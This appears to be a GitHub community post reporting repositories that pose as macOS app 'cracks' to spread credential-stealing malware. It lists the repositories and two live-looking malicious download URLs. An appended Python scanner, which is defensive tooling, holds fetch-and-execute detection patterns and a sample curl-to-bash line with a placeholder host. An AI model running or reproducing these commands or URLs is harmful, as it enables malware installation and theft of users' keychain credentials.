Batch Malware Report: Fake "Crack" app malware. #169448
Replies: 3 comments 1 reply
Also, I put this here instead of the report email/button so as to batch report and allow others to report too.
Yeah, it’s a big problem. On usersdrive (usersdrive.com) there are lots of scams like this one, using a curl attack (curl -fS SL or something like that) to trick the downloader into thinking that running the command will allow them to receive free apps, etc. Thanks for bringing this up :D
Hi @ProgMEM-CC, 👋🏻 We really appreciate you flagging this. The best route to get this to the proper GitHub team is to use our abuse reporting tools. Here's all the info: You can report behavior and content that violates community guidelines and terms. We are going to close this post, but for this and any future incidents, please refer to the links above. Thank you!
Select Topic Area
General
Body
There has been a lot of malware disguising itself as "NotchNook crack for macOS free download" or "NotchNook no payment free" or "Notchnook free license", but in the backend it just tricks the user into performing a bash curl attack, most of which download an "update file" from https://phannarith.com/get${x}/update, with x being a number; so far I have seen x as 4 or three.
The update file uses the stolen credentials to unlock the macOS keychain, which is a major security risk.
There are also some password-encrypted archives used as malware to prevent detection, mainly for Windows.
Here are some of the infringing repositories:
https://github.com/NotchNook-Mac-Download/NotchNook-Mac-Download?tab=readme-ov-file (fake notchnook "crack", atom stealer and dropper)
https://gist.github.com/sioresitoy2/75361b23517ebdbca8f182471e485c4b (Lumma malware)
https://github.com/Bartender-for-Mac/ (atom stealer, bartender fake "crack", same phannarith domain)
https://github.com/Bartender-4-Download (same malware atom stealer, same domain)
Here are the malicious domains:
https://veitzeatz.com/get4/install.sh
https://phannarith.com/get${x}/update
If anyone finds more malware, please report or comment it so it can be taken down.
Thanks.
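For anyone triaging similar repositories, a small README scanner follows as an added example; it is not part of the original post or any GitHub tooling. It flags fetch-and-execute one-liners and URLs matching the hosts and `/get<number>/...` path shape reported above. The regexes, the generalised path pattern, the function name `scan_text` and the sample README are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts and URL path shape taken from the report above; treating any
# /get<digits>/(update|install.sh) path as suspicious is an assumption.
REPORTED_HOSTS = {"phannarith.com", "veitzeatz.com"}
REPORTED_PATH = re.compile(r"^/get\d+/(update|install\.sh)$")
URL_RE = re.compile(r"https?://[^\s\"'`)<>|;]+")
# Fetch-and-execute shapes: `curl ... | sh` and `sh -c "$(curl ...)"`.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(/bin/)?(ba|z)?sh\b")
SUBSHELL_EXEC = re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")

# Constructed sample README; example.invalid hosts are placeholders.
SAMPLE_README = """\
# FreeApp crack for macOS (constructed sample)
Open Terminal and paste:
/bin/bash -c "$(curl -fsSL https://cdn.example.invalid/get7/install.sh)"
or: curl -fsSL https://cdn.example.invalid/setup | bash
Mirror: https://phannarith.com/get4/update
Docs: https://example.invalid/docs/readme
"""


def scan_text(text):
    """Return (line_no, reasons, urls) for every suspicious line in text."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        reasons = []
        urls = URL_RE.findall(line)
        if PIPE_TO_SHELL.search(line) or SUBSHELL_EXEC.search(line):
            reasons.append("fetch-and-execute")
        for url in urls:
            parsed = urlparse(url)
            host = (parsed.hostname or "").lower()
            if host in REPORTED_HOSTS or any(host.endswith("." + h) for h in REPORTED_HOSTS):
                reasons.append("reported-host")
            if REPORTED_PATH.match(parsed.path):
                reasons.append("reported-path-shape")
        if reasons:
            findings.append((no, sorted(set(reasons)), urls))
    return findings


if __name__ == "__main__":
    for no, reasons, urls in scan_text(SAMPLE_README):
        print(f"line {no}: {', '.join(reasons)} {urls}")
```

A fetch-and-execute hit alone is common in legitimate installers, so treat it as a prompt for review; a match on a reported host is the stronger signal.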